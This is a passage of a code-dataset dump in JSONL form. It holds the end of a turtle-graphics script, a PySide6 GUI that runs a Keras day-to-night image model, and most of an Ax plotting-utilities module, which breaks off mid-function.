\n\n# turn the motors off and save energy\nturtle.done()\n","repo_name":"fablabromagna-org/Draw-ER","sub_path":"Software/CircuitPython/4-poligoni-parametri.py","file_name":"4-poligoni-parametri.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39878956070","text":"from PySide6.QtWidgets import *\r\nfrom PySide6.QtUiTools import *\r\nfrom PySide6.QtCore import *\r\nfrom PySide6.QtGui import *\r\n\r\nfrom tensorflow.keras.models import load_model\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport argparse\r\n\r\n\r\nwidth = height = 256\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--input_model\", type=str, help='path of the model')\r\nargs = parser.parse_args()\r\n\r\n\r\nclass UI(QMainWindow):\r\n    def __init__(self):\r\n        super().__init__()\r\n        loader = QUiLoader()\r\n        self.ui = loader.load('form.ui', None)\r\n        self.ui.show()\r\n        self.ui.btn_choosemodel.clicked.connect(self.choose_model)\r\n        self.ui.btn_chooseimage.clicked.connect(self.choose_image)\r\n        self.ui.btn_result.clicked.connect(self.result)\r\n\r\n    def choose_model(self):\r\n        # getOpenFileName returns a (path, selected_filter) tuple; use the path\r\n        selected_model = QFileDialog.getOpenFileName(self, \"Choose Model\", \".\", \"All Files (*.*)\")\r\n        self.ui.txt_model.setText(selected_model[0])\r\n        self.model = load_model(selected_model[0])\r\n\r\n    def choose_image(self):\r\n        img_file = QFileDialog.getOpenFileName(self, \"Choose Image\", \".\", \"All Files (*.*)\")\r\n        img = cv2.imread(img_file[0])\r\n        self.img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n        img = QImage(self.img_rgb, self.img_rgb.shape[1], self.img_rgb.shape[0], QImage.Format_RGB888)\r\n        set_image = QPixmap.fromImage(img)\r\n        self.ui.lbl_image.setPixmap(set_image)\r\n\r\n    def result(self):\r\n        image = cv2.resize(self.img_rgb, (256, 256)).astype(np.float32)\r\n        image = image[np.newaxis, ...]\r\n        image = (image / 127.5) - 1\r\n        generator = self.model(image, training=True)\r\n        generator = np.squeeze(generator, axis=0)\r\n        generator = np.array((generator + 1) * 127.5).astype(np.uint8)\r\n        img = QImage(generator, generator.shape[1], generator.shape[0], QImage.Format_RGB888)\r\n        result_image = QPixmap.fromImage(img)\r\n        self.ui.lbl_result.setPixmap(result_image)\r\n\r\n\r\napp = QApplication([])\r\nwindow = UI()\r\napp.exec()\r\n","repo_name":"Parisa-Bagherzadeh/DeepLearning","sub_path":"UNet_day2night/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"17465615253","text":"import math\nfrom collections import Counter\n\nfrom logging import Logger\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\n\nimport numpy as np\nfrom ax.core.generator_run import GeneratorRun\nfrom ax.core.observation import Observation, ObservationFeatures\nfrom ax.core.parameter import (\n    ChoiceParameter,\n    FixedParameter,\n    Parameter,\n    ParameterType,\n    RangeParameter,\n)\nfrom ax.core.types import TParameterization\nfrom ax.modelbridge.base import ModelBridge\nfrom ax.modelbridge.prediction_utils import (\n    _compute_scalarized_outcome,\n    predict_at_point,\n)\nfrom ax.modelbridge.transforms.ivw import IVW\nfrom ax.plot.base import DECIMALS, PlotData, PlotInSampleArm, PlotOutOfSampleArm, Z\nfrom ax.utils.common.logger import get_logger\nfrom ax.utils.common.typeutils import not_none\n\nlogger: Logger = get_logger(__name__)\n\n# Typing alias\nRawData = 
List[Dict[str, Union[str, float]]]\n\nTNullableGeneratorRunsDict = Optional[Dict[str, GeneratorRun]]\n\n\ndef extend_range(\n lower: float, upper: float, percent: int = 10, log_scale: bool = False\n) -> Tuple[float, float]:\n \"\"\"Given a range of minimum and maximum values taken by values on a given axis,\n extend it in both directions by a given percentage to have some margin within\n the plot around its meaningful part.\n \"\"\"\n if upper <= lower:\n raise ValueError(\n f\"`upper` should be greater than `lower`, got: {upper} (<= {lower}).\"\n )\n\n if log_scale:\n raise NotImplementedError(\"Log scale not yet supported.\")\n\n margin = (upper - lower) * percent / 100\n\n return lower - margin, upper + margin\n\n\ndef _format_dict(param_dict: TParameterization, name: str = \"Parameterization\") -> str:\n \"\"\"Format a dictionary for labels.\n\n Args:\n param_dict: Dictionary to be formatted\n name: String name of the thing being formatted.\n\n Returns: stringified blob.\n \"\"\"\n if len(param_dict) >= 10:\n blob = \"{} has too many items to render on hover ({}).\".format(\n name, len(param_dict)\n )\n else:\n blob = \"
<br><em>{}:</em><br>{}\".format(\n            name, \"<br>\".join(\"{}: {}\".format(n, v) for n, v in param_dict.items())\n        )\n    return blob\n\n\ndef _wrap_metric(metric_name: str) -> str:\n    \"\"\" Put a newline on \"::\" for metric names.\n\n    Args:\n        metric_name: metric name.\n\n    Returns: wrapped metric name.\n    \"\"\"\n    if \"::\" in metric_name:\n        return \"<br>
\".join(metric_name.split(\"::\"))\n else:\n return metric_name\n\n\ndef _format_CI(estimate: float, sd: float, relative: bool, zval: float = Z) -> str:\n \"\"\"Format confidence intervals given estimate and standard deviation.\n\n Args:\n estimate: point estimate.\n sd: standard deviation of point estimate.\n relative: if True, '%' is appended.\n zval: z-value associated with desired CI (e.g. 1.96 for 95% CIs)\n\n Returns: formatted confidence interval.\n \"\"\"\n return \"[{lb:.{digits}f}{perc}, {ub:.{digits}f}{perc}]\".format(\n lb=estimate - zval * sd,\n ub=estimate + zval * sd,\n digits=DECIMALS,\n perc=\"%\" if relative else \"\",\n )\n\n\ndef arm_name_to_tuple(arm_name: str) -> Union[Tuple[int, int], Tuple[int]]:\n tup = arm_name.split(\"_\")\n if len(tup) == 2:\n try:\n return (int(tup[0]), int(tup[1]))\n except ValueError:\n return (0,)\n return (0,)\n\n\ndef arm_name_to_sort_key(arm_name: str) -> Tuple[str, int, int]:\n \"\"\"Parses arm name into tuple suitable for reverse sorting by key\n\n Example:\n arm_names = [\"0_0\", \"1_10\", \"1_2\", \"10_0\", \"control\"]\n sorted(arm_names, key=arm_name_to_sort_key, reverse=True)\n [\"control\", \"0_0\", \"1_2\", \"1_10\", \"10_0\"]\n \"\"\"\n try:\n trial_index, arm_index = arm_name.split(\"_\")\n return (\"\", -int(trial_index), -int(arm_index))\n except (ValueError, IndexError):\n return (arm_name, 0, 0)\n\n\ndef resize_subtitles(figure: Dict[str, Any], size: int) -> Dict[str, Any]:\n for ant in figure[\"layout\"][\"annotations\"]:\n ant[\"font\"].update(size=size)\n return figure\n\n\ndef _filter_dict(\n param_dict: TParameterization, subset_keys: List[str]\n) -> TParameterization:\n \"\"\"Filter a dictionary to keys present in a given list.\"\"\"\n return {k: v for k, v in param_dict.items() if k in subset_keys}\n\n\ndef _get_in_sample_arms(\n model: ModelBridge,\n metric_names: Set[str],\n fixed_features: Optional[ObservationFeatures] = None,\n data_selector: Optional[Callable[[Observation], bool]] = None,\n scalarized_metric_config: Optional[List[Dict[str, Dict[str, float]]]] = None,\n) -> Tuple[Dict[str, PlotInSampleArm], RawData, Dict[str, TParameterization]]:\n \"\"\"Get in-sample arms from a model with observed and predicted values\n for specified metrics.\n\n Returns a PlotInSampleArm object in which repeated observations are merged\n with IVW, and a RawData object in which every observation is listed.\n\n Fixed features input can be used to override fields of the insample arms\n when making model predictions.\n\n Args:\n model: An instance of the model bridge.\n metric_names: Restrict predictions to these metrics. 
If None, uses all\n metrics in the model.\n fixed_features: Features that should be fixed in the arms this function\n will obtain predictions for.\n data_selector: Function for selecting observations for plotting.\n\n Returns:\n A tuple containing\n\n - Map from arm name to PlotInSampleArm.\n - List of the data for each observation like::\n\n {'metric_name': 'likes', 'arm_name': '0_0', 'mean': 1., 'sem': 0.1}\n\n - Map from arm name to parameters\n \"\"\"\n observations = model.get_training_data()\n training_in_design = model.training_in_design\n if data_selector is not None:\n observations = [obs for obs in observations if data_selector(obs)]\n training_in_design = [\n model.training_in_design[i]\n for i, obs in enumerate(observations)\n if data_selector(obs)\n ]\n trial_selector = None\n if fixed_features is not None:\n trial_selector = fixed_features.trial_index\n # Calculate raw data\n raw_data = []\n arm_name_to_parameters = {}\n for obs in observations:\n arm_name_to_parameters[obs.arm_name] = obs.features.parameters\n for j, metric_name in enumerate(obs.data.metric_names):\n if metric_name in metric_names:\n raw_data.append(\n {\n \"metric_name\": metric_name,\n \"arm_name\": obs.arm_name,\n \"mean\": obs.data.means[j],\n \"sem\": np.sqrt(obs.data.covariance[j, j]),\n }\n )\n\n # Check that we have one ObservationFeatures per arm name since we\n # key by arm name and the model is not Multi-task.\n # If \"TrialAsTask\" is present, one of the arms is chosen based on the selected\n # trial index in the fixed_features.\n if (\"TrialAsTask\" not in model.transforms.keys() or trial_selector is None) and (\n len(arm_name_to_parameters) != len(observations)\n ):\n logger.error(\n \"Have observations of arms with different features but same\"\n \" name. 
Arbitrary one will be plotted.\"\n )\n\n # Merge multiple measurements within each Observation with IVW to get\n # un-modeled prediction\n t = IVW(None, [])\n observations = t.transform_observations(observations)\n # Start filling in plot data\n in_sample_plot: Dict[str, PlotInSampleArm] = {}\n for i, obs in enumerate(observations):\n if obs.arm_name is None:\n raise ValueError(\"Observation must have arm name for plotting.\")\n\n # Extract raw measurement\n obs_y = {} # Observed metric means.\n obs_se = {} # Observed metric standard errors.\n for j, metric_name in enumerate(obs.data.metric_names):\n if metric_name in metric_names:\n obs_y[metric_name] = obs.data.means[j]\n obs_se[metric_name] = np.sqrt(obs.data.covariance[j, j])\n # Obtain aggregated outcomes if scalarized_metric_config is provided\n if scalarized_metric_config is not None:\n for agg_metric in scalarized_metric_config:\n agg_metric_name = agg_metric[\"name\"]\n if agg_metric_name in metric_names:\n agg_mean, agg_var = _compute_scalarized_outcome(\n mean_dict=obs.data.means_dict,\n cov_dict=obs.data.covariance_matrix,\n agg_metric_weight_dict=agg_metric[\"weight\"],\n )\n obs_y[agg_metric_name] = agg_mean\n obs_se[agg_metric_name] = np.sqrt(agg_var)\n if training_in_design[i]:\n # Update with the input fixed features\n features = obs.features\n if fixed_features is not None:\n features.update_features(fixed_features)\n # Make a prediction.\n pred_y, pred_se = predict_at_point(\n model, features, metric_names, scalarized_metric_config\n )\n elif (trial_selector is not None) and (\n obs.features.trial_index != trial_selector\n ):\n # check whether the observation is from the right trial\n # need to use raw data in the selected trial for out-of-design points\n continue\n else:\n pred_y = obs_y\n pred_se = obs_se\n in_sample_plot[not_none(obs.arm_name)] = PlotInSampleArm(\n name=not_none(obs.arm_name),\n y=obs_y,\n se=obs_se,\n parameters=obs.features.parameters,\n y_hat=pred_y,\n se_hat=pred_se,\n context_stratum=None,\n )\n return in_sample_plot, raw_data, arm_name_to_parameters\n\n\ndef _get_out_of_sample_arms(\n model: ModelBridge,\n generator_runs_dict: Dict[str, GeneratorRun],\n metric_names: Set[str],\n fixed_features: Optional[ObservationFeatures] = None,\n scalarized_metric_config: Optional[List[Dict[str, Dict[str, float]]]] = None,\n) -> Dict[str, Dict[str, PlotOutOfSampleArm]]:\n \"\"\"Get out-of-sample predictions from a model given a dict of generator runs.\n\n Fixed features input can be used to override fields of the candidate arms\n when making model predictions.\n\n Args:\n model: The model.\n generator_runs_dict: a mapping from generator run name to generator run.\n metric_names: metrics to include in the plot.\n\n Returns:\n A mapping from name to a mapping from arm name to plot.\n\n \"\"\"\n out_of_sample_plot: Dict[str, Dict[str, PlotOutOfSampleArm]] = {}\n for generator_run_name, generator_run in generator_runs_dict.items():\n out_of_sample_plot[generator_run_name] = {}\n for arm in generator_run.arms:\n # This assumes context is None\n obsf = ObservationFeatures.from_arm(arm)\n if fixed_features is not None:\n obsf.update_features(fixed_features)\n\n # Make a prediction\n try:\n pred_y, pred_se = predict_at_point(\n model, obsf, metric_names, scalarized_metric_config\n )\n except Exception:\n # Check if it is an out-of-design arm.\n if not model.model_space.check_membership(obsf.parameters):\n # Skip this point\n continue\n else:\n # It should have worked\n raise\n arm_name = 
arm.name_or_short_signature\n out_of_sample_plot[generator_run_name][arm_name] = PlotOutOfSampleArm(\n name=arm_name,\n parameters=obsf.parameters,\n y_hat=pred_y,\n se_hat=pred_se,\n context_stratum=None,\n )\n return out_of_sample_plot\n\n\ndef get_plot_data(\n model: ModelBridge,\n generator_runs_dict: Dict[str, GeneratorRun],\n metric_names: Optional[Set[str]] = None,\n fixed_features: Optional[ObservationFeatures] = None,\n data_selector: Optional[Callable[[Observation], bool]] = None,\n scalarized_metric_config: Optional[List[Dict[str, Dict[str, float]]]] = None,\n) -> Tuple[PlotData, RawData, Dict[str, TParameterization]]:\n \"\"\"Format data object with metrics for in-sample and out-of-sample\n arms.\n\n Calculate both observed and predicted metrics for in-sample arms.\n Calculate predicted metrics for out-of-sample arms passed via the\n `generator_runs_dict` argument.\n\n In PlotData, in-sample observations are merged with IVW. In RawData, they\n are left un-merged and given as a list of dictionaries, one for each\n observation and having keys 'arm_name', 'mean', and 'sem'.\n\n Args:\n model: The model.\n generator_runs_dict: a mapping from generator run name to generator run.\n metric_names: Restrict predictions to this set. If None, all metrics\n in the model will be returned.\n fixed_features: Fixed features to use when making model predictions.\n data_selector: Function for selecting observations for plotting.\n scalarized_metric_config: An optional list of dicts specifying how to aggregate\n multiple metrics into a single scalarized metric. For each dict, the key is\n the name of the new scalarized metric, and the value is a dictionary mapping\n each metric to its weight. e.g.\n {\"name\": \"metric1:agg\", \"weight\": {\"metric1_c1\": 0.5, \"metric1_c2\": 0.5}}.\n\n Returns:\n A tuple containing\n\n - PlotData object with in-sample and out-of-sample predictions.\n - List of observations like::\n\n {'metric_name': 'likes', 'arm_name': '0_1', 'mean': 1., 'sem': 0.1}.\n\n - Mapping from arm name to parameters.\n \"\"\"\n metrics_plot = model.metric_names if metric_names is None else metric_names\n in_sample_plot, raw_data, cond_name_to_parameters = _get_in_sample_arms(\n model=model,\n metric_names=metrics_plot,\n fixed_features=fixed_features,\n data_selector=data_selector,\n scalarized_metric_config=scalarized_metric_config,\n )\n out_of_sample_plot = _get_out_of_sample_arms(\n model=model,\n generator_runs_dict=generator_runs_dict,\n metric_names=metrics_plot,\n fixed_features=fixed_features,\n scalarized_metric_config=scalarized_metric_config,\n )\n status_quo_name = None if model.status_quo is None else model.status_quo.arm_name\n plot_data = PlotData(\n metrics=list(metrics_plot),\n in_sample=in_sample_plot,\n out_of_sample=out_of_sample_plot,\n status_quo_name=status_quo_name,\n )\n return plot_data, raw_data, cond_name_to_parameters\n\n\ndef get_range_parameter(model: ModelBridge, param_name: str) -> RangeParameter:\n \"\"\"\n Get the range parameter with the given name from the model.\n\n Throws if parameter doesn't exist or is not a range parameter.\n\n Args:\n model: The model.\n param_name: The name of the RangeParameter to be found.\n\n Returns: The RangeParameter named `param_name`.\n \"\"\"\n\n range_param = model.model_space.parameters.get(param_name)\n if range_param is None:\n raise ValueError(f\"Parameter `{param_name}` does not exist.\")\n if not isinstance(range_param, RangeParameter):\n raise ValueError(f\"{param_name} is not a RangeParameter\")\n\n return 
range_param\n\n\ndef get_range_parameters_from_list(\n parameters: List[Parameter], min_num_values: int = 0\n) -> List[RangeParameter]:\n \"\"\"\n Get a list of range parameters from a model.\n\n Args:\n parameters: List of parameters\n min_num_values: Minimum number of values\n\n Returns: List of RangeParameters.\n \"\"\"\n return [\n parameter\n for parameter in parameters\n if isinstance(parameter, RangeParameter)\n and (\n parameter.parameter_type == ParameterType.FLOAT\n or parameter.upper - parameter.lower + 1 >= min_num_values\n )\n ]\n\n\ndef get_range_parameters(\n model: ModelBridge, min_num_values: int = 0\n) -> List[RangeParameter]:\n \"\"\"\n Get a list of range parameters from a model.\n\n Args:\n model: The model.\n min_num_values: Minimum number of values\n\n Returns: List of RangeParameters.\n \"\"\"\n return get_range_parameters_from_list(\n parameters=list(model.model_space.parameters.values()),\n min_num_values=min_num_values,\n )\n\n\ndef get_grid_for_parameter(parameter: RangeParameter, density: int) -> np.ndarray:\n \"\"\"Get a grid of points along the range of the parameter.\n\n Will be a log-scale grid if parameter is log scale.\n\n Args:\n parameter: Parameter for which to generate grid.\n density: Number of points in the grid.\n \"\"\"\n is_log = parameter.log_scale\n if is_log:\n grid = np.linspace(\n np.log10(parameter.lower), np.log10(parameter.upper), density\n )\n grid = 10**grid\n else:\n grid = np.linspace(parameter.lower, parameter.upper, density)\n return grid\n\n\ndef get_fixed_values(\n model: ModelBridge,\n slice_values: Optional[Dict[str, Any]] = None,\n trial_index: Optional[int] = None,\n) -> TParameterization:\n \"\"\"Get fixed values for parameters in a slice plot.\n\n If there is an in-design status quo, those values will be used. 
Otherwise,\n the mean of RangeParameters or the mode of ChoiceParameters is used.\n\n Any value in slice_values will override the above.\n\n Args:\n model: ModelBridge being used for plotting\n slice_values: Map from parameter name to value at which is should be\n fixed.\n\n Returns: Map from parameter name to fixed value.\n \"\"\"\n\n if trial_index is not None:\n if slice_values is None:\n slice_values = {}\n slice_values[\"TRIAL_PARAM\"] = str(trial_index)\n\n # Check if status_quo is in design\n if model.status_quo is not None and model.model_space.check_membership(\n model.status_quo.features.parameters\n ):\n setx = model.status_quo.features.parameters\n else:\n observations = model.get_training_data()\n setx = {}\n for p_name, parameter in model.model_space.parameters.items():\n # Exclude out of design status quo (no parameters)\n vals = [\n obs.features.parameters[p_name]\n for obs in observations\n if (\n len(obs.features.parameters) > 0\n and parameter.validate(obs.features.parameters[p_name])\n )\n ]\n if isinstance(parameter, FixedParameter):\n setx[p_name] = parameter.value\n elif isinstance(parameter, ChoiceParameter):\n setx[p_name] = Counter(vals).most_common(1)[0][0]\n elif isinstance(parameter, RangeParameter):\n setx[p_name] = parameter.cast(np.mean(vals))\n\n if slice_values is not None:\n # slice_values has type Dictionary[str, Any]\n setx.update(slice_values)\n return setx\n\n\n# Utility methods ported from JS\n# pyre-fixme[2]: Parameter must be annotated.\ndef contour_config_to_trace(config) -> List[Dict[str, Any]]:\n # Load from config\n arm_data = config[\"arm_data\"]\n density = config[\"density\"]\n grid_x = config[\"grid_x\"]\n grid_y = config[\"grid_y\"]\n f = config[\"f\"]\n lower_is_better = config[\"lower_is_better\"]\n metric = config[\"metric\"]\n rel = config[\"rel\"]\n sd = config[\"sd\"]\n xvar = config[\"xvar\"]\n yvar = config[\"yvar\"]\n\n green_scale = config[\"green_scale\"]\n green_pink_scale = config[\"green_pink_scale\"]\n blue_scale = config[\"blue_scale\"]\n\n # format data\n res = relativize_data(f, sd, rel, arm_data, metric)\n f_final = res[0]\n sd_final = res[1]\n\n # calculate max of abs(outcome), used for colorscale\n f_absmax = max(abs(min(f_final)), max(f_final))\n\n # transform to nested array\n f_plt = []\n for ind in range(0, len(f_final), density):\n f_plt.append(f_final[ind : ind + density])\n sd_plt = []\n for ind in range(0, len(sd_final), density):\n sd_plt.append(sd_final[ind : ind + density])\n\n CONTOUR_CONFIG = {\n \"autocolorscale\": False,\n \"autocontour\": True,\n \"contours\": {\"coloring\": \"heatmap\"},\n \"hoverinfo\": \"x+y+z\",\n \"ncontours\": int(density / 2),\n \"type\": \"contour\",\n \"x\": grid_x,\n \"y\": grid_y,\n }\n\n if rel:\n f_scale = reversed(green_pink_scale) if lower_is_better else green_pink_scale\n else:\n f_scale = green_scale\n\n f_trace = {\n \"colorbar\": {\n \"x\": 0.45,\n \"y\": 0.5,\n \"ticksuffix\": \"%\" if rel else \"\",\n \"tickfont\": {\"size\": 8},\n },\n \"colorscale\": [(i / (len(f_scale) - 1), rgb(v)) for i, v in enumerate(f_scale)],\n \"xaxis\": \"x\",\n \"yaxis\": \"y\",\n \"z\": f_plt,\n # zmax and zmin are ignored if zauto is true\n \"zauto\": not rel,\n \"zmax\": f_absmax,\n \"zmin\": -f_absmax,\n }\n\n sd_trace = {\n \"colorbar\": {\n \"x\": 1,\n \"y\": 0.5,\n \"ticksuffix\": \"%\" if rel else \"\",\n \"tickfont\": {\"size\": 8},\n },\n \"colorscale\": [\n (i / (len(blue_scale) - 1), rgb(v)) for i, v in enumerate(blue_scale)\n ],\n \"xaxis\": \"x2\",\n \"yaxis\": \"y2\",\n 
\"z\": sd_plt,\n }\n\n f_trace.update(CONTOUR_CONFIG)\n sd_trace.update(CONTOUR_CONFIG)\n\n # get in-sample arms\n arm_names = list(arm_data[\"in_sample\"].keys())\n arm_x = [\n arm_data[\"in_sample\"][arm_name][\"parameters\"][xvar] for arm_name in arm_names\n ]\n arm_y = [\n arm_data[\"in_sample\"][arm_name][\"parameters\"][yvar] for arm_name in arm_names\n ]\n arm_text = []\n for arm_name in arm_names:\n atext = f\"Arm {arm_name}\"\n params = arm_data[\"in_sample\"][arm_name][\"parameters\"]\n ys = arm_data[\"in_sample\"][arm_name][\"y\"]\n ses = arm_data[\"in_sample\"][arm_name][\"se\"]\n for yname in ys.keys():\n sem_str = f\"{ses[yname]}\" if ses[yname] is None else f\"{ses[yname]:.6g}\"\n y_str = f\"{ys[yname]}\" if ys[yname] is None else f\"{ys[yname]:.6g}\"\n atext += f\"
<br>{yname}: {y_str} (SEM: {sem_str})\"\n        for pname in params.keys():\n            pval = params[pname]\n            pstr = f\"{pval:.6g}\" if isinstance(pval, float) else f\"{pval}\"\n            atext += f\"<br>
{pname}: {pstr}\"\n arm_text.append(atext)\n\n # configs for in-sample arms\n base_in_sample_arm_config = {\n \"hoverinfo\": \"text\",\n \"legendgroup\": \"In-sample\",\n \"marker\": {\"color\": \"black\", \"symbol\": 1, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"name\": \"In-sample\",\n \"text\": arm_text,\n \"type\": \"scatter\",\n \"x\": arm_x,\n \"y\": arm_y,\n }\n\n f_in_sample_arm_trace = {\"xaxis\": \"x\", \"yaxis\": \"y\"}\n\n sd_in_sample_arm_trace = {\"showlegend\": False, \"xaxis\": \"x2\", \"yaxis\": \"y2\"}\n\n # pyre-fixme[6]: For 1st param expected `SupportsKeysAndGetItem[str, str]` but\n # got `Dict[str, Union[Dict[str, Union[float, str]], List[typing.Any], str]]`.\n f_in_sample_arm_trace.update(base_in_sample_arm_config)\n # pyre-fixme[6]: For 1st param expected `SupportsKeysAndGetItem[str, Union[bool,\n # str]]` but got `Dict[str, Union[Dict[str, Union[float, str]], List[typing.Any],\n # str]]`.\n sd_in_sample_arm_trace.update(base_in_sample_arm_config)\n\n traces = [f_trace, sd_trace, f_in_sample_arm_trace, sd_in_sample_arm_trace]\n\n # iterate over out-of-sample arms\n for i, generator_run_name in enumerate(arm_data[\"out_of_sample\"].keys()):\n symbol = i + 2 # symbols starts from 2 for candidate markers\n\n ax = []\n ay = []\n atext = []\n\n for arm_name in arm_data[\"out_of_sample\"][generator_run_name].keys():\n ax.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"parameters\"][\n xvar\n ]\n )\n ay.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"parameters\"][\n yvar\n ]\n )\n atext.append(\"Candidate \" + arm_name + \"\")\n\n traces.append(\n {\n \"hoverinfo\": \"text\",\n \"legendgroup\": generator_run_name,\n \"marker\": {\"color\": \"black\", \"symbol\": symbol, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"name\": generator_run_name,\n \"text\": atext,\n \"type\": \"scatter\",\n \"xaxis\": \"x\",\n \"x\": ax,\n \"yaxis\": \"y\",\n \"y\": ay,\n }\n )\n traces.append(\n {\n \"hoverinfo\": \"text\",\n \"legendgroup\": generator_run_name,\n \"marker\": {\"color\": \"black\", \"symbol\": symbol, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"name\": \"In-sample\",\n \"showlegend\": False,\n \"text\": atext,\n \"type\": \"scatter\",\n \"x\": ax,\n \"xaxis\": \"x2\",\n \"y\": ay,\n \"yaxis\": \"y2\",\n }\n )\n\n return traces\n\n\ndef axis_range(grid: List[float], is_log: bool) -> List[float]:\n if is_log:\n return [math.log10(min(grid)), math.log10(max(grid))]\n else:\n return [min(grid), max(grid)]\n\n\ndef relativize(m_t: float, sem_t: float, m_c: float, sem_c: float) -> List[float]:\n r_hat = (m_t - m_c) / abs(m_c) - sem_c**2 * m_t / abs(m_c) ** 3\n variance = (sem_t**2 + (m_t / m_c * sem_c) ** 2) / m_c**2\n return [r_hat, math.sqrt(variance)]\n\n\ndef relativize_data(\n f: List[float],\n sd: List[float],\n rel: bool,\n # pyre-fixme[2]: Parameter annotation cannot contain `Any`.\n arm_data: Dict[Any, Any],\n metric: str,\n) -> List[List[float]]:\n # if relative, extract status quo & compute ratio\n f_final = [] if rel else f\n sd_final = [] if rel else sd\n\n if rel:\n f_sq = arm_data[\"in_sample\"][arm_data[\"status_quo_name\"]][\"y\"][metric]\n sd_sq = arm_data[\"in_sample\"][arm_data[\"status_quo_name\"]][\"se\"][metric]\n\n for i in range(len(f)):\n res = relativize(f[i], sd[i], f_sq, sd_sq)\n f_final.append(100 * res[0])\n sd_final.append(100 * res[1])\n\n return [f_final, sd_final]\n\n\ndef rgb(arr: List[int]) -> str:\n return \"rgb({},{},{})\".format(*arr)\n\n\ndef infer_is_relative(\n model: ModelBridge, 
metrics: List[str], non_constraint_rel: bool\n) -> Dict[str, bool]:\n \"\"\"Determine whether or not to relativize a metric.\n\n Metrics that are constraints will get this decision from their `relative` flag.\n Other metrics will use the `default_rel`.\n\n Args:\n model: model fit on metrics.\n metrics: list of metric names.\n non_constraint_rel: whether or not to relativize non-constraint metrics\n\n Returns:\n Dict[str, bool] containing whether or not to relativize each input metric.\n \"\"\"\n relative = {}\n constraint_relativity = {}\n if model._optimization_config:\n constraints = not_none(model._optimization_config).outcome_constraints\n constraint_relativity = {\n constraint.metric.name: constraint.relative for constraint in constraints\n }\n for metric in metrics:\n if metric not in constraint_relativity:\n relative[metric] = non_constraint_rel\n else:\n relative[metric] = constraint_relativity[metric]\n return relative\n\n\ndef slice_config_to_trace(\n # pyre-fixme[2]: Parameter must be annotated.\n arm_data,\n # pyre-fixme[2]: Parameter must be annotated.\n arm_name_to_parameters,\n f: List[float],\n # pyre-fixme[2]: Parameter must be annotated.\n fit_data,\n # pyre-fixme[2]: Parameter must be annotated.\n grid,\n metric: str,\n # pyre-fixme[2]: Parameter must be annotated.\n param,\n rel: bool,\n # pyre-fixme[2]: Parameter must be annotated.\n setx,\n sd: List[float],\n # pyre-fixme[2]: Parameter must be annotated.\n is_log,\n # pyre-fixme[2]: Parameter must be annotated.\n visible,\n) -> List[Dict[str, Any]]:\n # format data\n res = relativize_data(f, sd, rel, arm_data, metric)\n f_final = res[0]\n sd_final = res[1]\n\n # get data for standard deviation fill plot\n sd_upper = []\n sd_lower = []\n for i in range(len(sd)):\n sd_upper.append(f_final[i] + 2 * sd_final[i])\n sd_lower.append(f_final[i] - 2 * sd_final[i])\n grid_rev = list(reversed(grid))\n sd_lower_rev = list(reversed(sd_lower))\n sd_x = grid + grid_rev\n sd_y = sd_upper + sd_lower_rev\n\n # get data for observed arms and error bars\n arm_x = []\n arm_y = []\n arm_sem = []\n for row in fit_data:\n parameters = arm_name_to_parameters[row[\"arm_name\"]]\n plot = True\n for p in setx.keys():\n if p != param and parameters[p] != setx[p]:\n plot = False\n if plot:\n arm_x.append(parameters[param])\n arm_y.append(row[\"mean\"])\n arm_sem.append(row[\"sem\"])\n\n arm_res = relativize_data(arm_y, arm_sem, rel, arm_data, metric)\n arm_y_final = arm_res[0]\n arm_sem_final = [x * 2 if x is not None else None for x in arm_res[1]]\n\n # create traces\n f_trace = {\n \"x\": grid,\n \"y\": f_final,\n \"showlegend\": False,\n \"hoverinfo\": \"x+y\",\n \"line\": {\"color\": \"rgba(128, 177, 211, 1)\"},\n \"visible\": visible,\n }\n\n arms_trace = {\n \"x\": arm_x,\n \"y\": arm_y_final,\n \"mode\": \"markers\",\n \"error_y\": {\n \"type\": \"data\",\n \"array\": arm_sem_final,\n \"visible\": True,\n \"color\": \"black\",\n },\n \"line\": {\"color\": \"black\"},\n \"showlegend\": False,\n \"hoverinfo\": \"x+y\",\n \"visible\": visible,\n }\n\n sd_trace = {\n \"x\": sd_x,\n \"y\": sd_y,\n \"fill\": \"toself\",\n \"fillcolor\": \"rgba(128, 177, 211, 0.2)\",\n \"line\": {\"color\": \"rgba(128, 177, 211, 0.0)\"},\n \"showlegend\": False,\n \"hoverinfo\": \"none\",\n \"visible\": visible,\n }\n\n traces = [sd_trace, f_trace, arms_trace]\n\n # iterate over out-of-sample arms\n for i, generator_run_name in enumerate(arm_data[\"out_of_sample\"].keys()):\n ax = []\n ay = []\n asem = []\n atext = []\n\n for arm_name in 
arm_data[\"out_of_sample\"][generator_run_name].keys():\n parameters = arm_data[\"out_of_sample\"][generator_run_name][arm_name][\n \"parameters\"\n ]\n plot = True\n for p in setx.keys():\n if p != param and parameters[p] != setx[p]:\n plot = False\n if plot:\n ax.append(parameters[param])\n ay.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"y_hat\"][\n metric\n ]\n )\n asem.append(\n arm_data[\"out_of_sample\"][generator_run_name][arm_name][\"se_hat\"][\n metric\n ]\n )\n atext.append(\"Candidate \" + arm_name + \"\")\n\n out_of_sample_arm_res = relativize_data(ay, asem, rel, arm_data, metric)\n ay_final = out_of_sample_arm_res[0]\n asem_final = [x * 2 for x in out_of_sample_arm_res[1]]\n\n traces.append(\n {\n \"hoverinfo\": \"text\",\n \"legendgroup\": generator_run_name,\n \"marker\": {\"color\": \"black\", \"symbol\": i + 1, \"opacity\": 0.5},\n \"mode\": \"markers\",\n \"error_y\": {\n \"type\": \"data\",\n \"array\": asem_final,\n \"visible\": True,\n \"color\": \"black\",\n },\n \"name\": generator_run_name,\n \"text\": atext,\n \"type\": \"scatter\",\n \"xaxis\": \"x\",\n \"x\": ax,\n \"yaxis\": \"y\",\n \"y\": 